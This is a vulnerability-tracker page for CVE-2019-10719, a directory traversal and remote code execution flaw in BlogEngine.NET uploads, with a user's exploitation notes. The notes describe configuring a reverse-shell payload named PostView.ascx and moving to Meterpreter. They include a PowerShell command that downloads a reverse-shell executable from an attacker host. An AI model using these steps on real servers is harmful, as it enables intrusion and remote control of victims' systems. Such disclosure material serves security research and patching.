BlogEngine.NET 3.3.7.0 and earlier allows Directory Traversal and Remote Code Execution because file creation is mishandled, related to /api/upload and BlogEngine.NET/AppCode/Api/UploadController.cs. NOTE: this issue exists because of an incomplete fix for CVE-2019-6714.
Recent assessments:
Leafry at February 06, 2021 4:28pm UTC reported:
This attack was extremely easy to use. My jaw almost hit the ground at the ease. My only worry is that this will be a very hard attack to find in the wild as it depends on specific versions of the software to work.
Things to keep in mind:
-You will need to change your IP address and port inside the script. Near the beginning of the script, there is a line for System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient(”\(LHOST", \)LPORT). Set the host and port accordingly.
-I have had several instances where I would need to restart the BlogEngine server or the reverse shell would hang up in some terminal windows but not others, this exploit creates a very unstable shell.
-The script should be named PostView.ascx
Moving from here:
-It is recommended to upgrade to a different shell as soon as possible.
-I have had the most luck with Meterpreter. Creating a reverse shell with msfvenom and then uploading it to the BlogEngine server with PowerShell. –> powershell Invoke-WebRequest -Uri <http://10.10.10.10:8888/reverse.exe> -Outfile reverse.exe
Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0
packetstormsecurity.com/files/153347/BlogEngine.NET-3.3.6-3.3.7-dirPath-Directory-Traversal-Remote-Code-Execution.html
seclists.org/fulldisclosure/2019/Jun/26
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10719
www.securitymetrics.com/blog/BlogEngineNET-Directory-Traversal-Remote-Code-Execution-CVE-2019-10719-CVE-2019-10720